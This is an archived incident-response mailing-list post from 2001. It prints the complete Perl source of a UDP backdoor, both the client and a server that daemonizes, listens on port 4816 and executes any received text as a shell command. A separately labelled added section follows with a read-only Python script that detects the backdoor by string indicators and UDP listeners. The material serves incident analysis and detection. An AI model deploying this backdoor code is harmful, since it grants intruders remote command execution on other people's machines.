Security Incidents mailing list archives

Re: New rootkit?


From: Blake Frantz <blake () mc net>
Date: Wed, 12 Dec 2001 14:18:54 -0600 (CST)


I recognize the perl script.  I have it and the client portion of it.  

<client>
#!/usr/bin/perl
 
use IO::Socket;
use Getopt::Std;
 
getopts('s:p:h', \%opt)||die("Error: Unable to get command line options
!!!\n");
 
if(defined($opt{'h'})) { \&usage() }
if(defined($opt{'s'})) { $server=$opt{'s'} } else { \&usage() }
if(defined($opt{'p'})) { $port=$opt{'p'} } else { \&usage() }
 
 
$|=1;
$maxlen=1024;
 
$sock=IO::Socket::INET->new(Proto=>'udp')
or die("Error: Cannot initialize socket !!!\n");
$ipaddr=inet_aton($server);
$portaddr=sockaddr_in($port, $ipaddr);
 
 
print("\nAUDP Backdoor started.\n");
print("======================\n");
 
while(1) {
 print("=> ");
 $mesg=<STDIN>;
 chomp $mesg;
 if($mesg!~/^\s*$/) {
  send($sock, $mesg."\n", 0, $portaddr)==length($mesg."\n");
 
  while($portaddr=recv($sock, $msg, $maxlen, 0)) {
   if($msg=~/^\-end\.$/) { last } else {
    print $msg;
   }
  }
 }
} 
 
sub usage() {
   print("\nAUDP - Programmed by Anarchy\n");
   print("============================\n");
   print("Usage: AUDP -s <host> -p <port>\n\n");
   exit 1;
}
</client>

I googled and found what appears to be another perl script written by the
same author:
http://fringe.davesource.com/Fringe/Hacking/Hacks/Credit_Card_Generator

If you compare the sigs in the code they appear to be written by the
person who sat/is sitting at anarchy () elxsi de.

Hope this helps.

-Blake



/usr/lib/.r00t/.r00tshocky was a perl script to listen for messages on UDP:

#!/usr/bin/perl

$pid=fork;
exit if $pid;
die("Error.") unless defined($pid);

use IO::Socket;
use POSIX;
POSIX::setsid();
$time_to_die=0;

sub signal_handler {
  $time_to_die=1;
}

$SIG{INT}=$SIG{TERM}=$SIG{HUP}=\&signal_handler;

until($time_to_die) {
$|=1;

$port=4816;
$maxlen=1024;

my($sock, $raddr, $rhost);

$sock=IO::Socket::INET->new(LocalPort=>$port,Proto=>'udp') or 
die("Error.Merge deja\n");

while($sock->recv($msg, $maxlen)) {
print $msg;
  my($rport, $ipaddr)=sockaddr_in($sock->peername);
  $rhost=gethostbyaddr($ipaddr, AF_INET);
   $output=`$msg`;
   $sock->send($output);
   $sock->send("-end.");
}
}
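For a responder who has just read the two scripts above, the practical question is how to find this backdoor on other hosts. The following Python script is an added example written for this archive page; it is not code from the thread or from the backdoor's author. It performs two read-only checks using only indicators visible in the post: it searches files for literal strings the two Perl scripts contain (the "AUDP Backdoor" banner, the "Programmed by Anarchy" usage text, the "-end." terminator, the backtick command execution, the /usr/lib/.r00t path), and it parses `ss -lunp` output to flag UDP listeners bound to the server's hard-coded port 4816 or owned by a scripting interpreter. The `ss` output embedded in the block is constructed for demonstration, and the list of interpreter process names is an assumption about what normally should not own a UDP listener.

```python
#!/usr/bin/env python3
"""Read-only triage for the AUDP UDP backdoor described in this thread (added example)."""
import re
import subprocess
import sys
from pathlib import Path

# Literal strings lifted from the client and server scripts in the thread.
# They are search patterns only; nothing here executes any of that code.
TEXT_INDICATORS = {
    "audp_banner": "AUDP Backdoor started.",
    "audp_usage": "Programmed by Anarchy",
    "end_marker": '"-end."',
    "backtick_exec": "$output=`$msg`",
    "r00t_dir": "/usr/lib/.r00t",
}
BACKDOOR_PORT = 4816  # hard-coded in the .r00tshocky server script
# Assumption: a UDP listener owned by one of these is unusual on a server.
INTERPRETERS = {"perl", "python", "python3", "ruby", "sh", "bash"}

# Constructed sample of `ss -lunp` output (not captured from a real host).
SAMPLE_SS_OUTPUT = """State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
UNCONN 0      0      0.0.0.0:4816       0.0.0.0:*         users:(("perl",pid=1234,fd=3))
UNCONN 0      0      127.0.0.1:323      0.0.0.0:*         users:(("chronyd",pid=800,fd=5))
UNCONN 0      0      [::]:5353          [::]:*            users:(("avahi-daemon",pid=900,fd=12))
"""


def scan_text(text):
    """Return the names of every indicator whose literal string occurs in text."""
    return sorted(name for name, needle in TEXT_INDICATORS.items() if needle in text)


def scan_file(path):
    """Scan one file; unreadable files simply yield no hits."""
    try:
        data = Path(path).read_bytes().decode("utf-8", errors="replace")
    except OSError:
        return []
    return scan_text(data)


_PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')


def parse_ss_udp(output):
    """Parse `ss -lunp` lines into dicts of local address, port, process name and pid."""
    rows = []
    for line in output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "UNCONN":
            continue  # header or non-listener line
        addr, _, port = fields[3].rpartition(":")
        if not port.isdigit():
            continue
        m = _PROC_RE.search(line)
        rows.append({
            "addr": addr,
            "port": int(port),
            "proc": m.group(1) if m else None,
            "pid": int(m.group(2)) if m else None,
        })
    return rows


def suspicious_udp_listeners(rows, port=BACKDOOR_PORT):
    """Flag listeners on the backdoor port or owned by a scripting interpreter."""
    return [r for r in rows if r["port"] == port or r["proc"] in INTERPRETERS]


def main(argv):
    """Usage: triage.py [FILE ...]  (scans the files, then the live `ss -lunp` table)."""
    for p in argv[1:]:
        hits = scan_file(p)
        if hits:
            print(f"{p}: {', '.join(hits)}")
    try:
        out = subprocess.run(["ss", "-lunp"], capture_output=True, text=True, check=False).stdout
    except FileNotFoundError:
        print("ss not available; skipping listener check")
        return
    for r in suspicious_udp_listeners(parse_ss_udp(out)):
        print(f"suspicious UDP listener {r['addr']}:{r['port']} proc={r['proc']} pid={r['pid']}")


if __name__ == "__main__":
    main(sys.argv)
```

Running it against a directory of user home directories and /usr/lib (for example via `find ... -exec`) covers the dropped files, while the `ss` check catches a running copy even if the file has been renamed, since the port and the interpreter are fixed by the script itself. Matching on literal strings is deliberately narrow: a rebuilt variant with different banners will slip past, so the listener check is the one to keep in a standing detection.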





----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com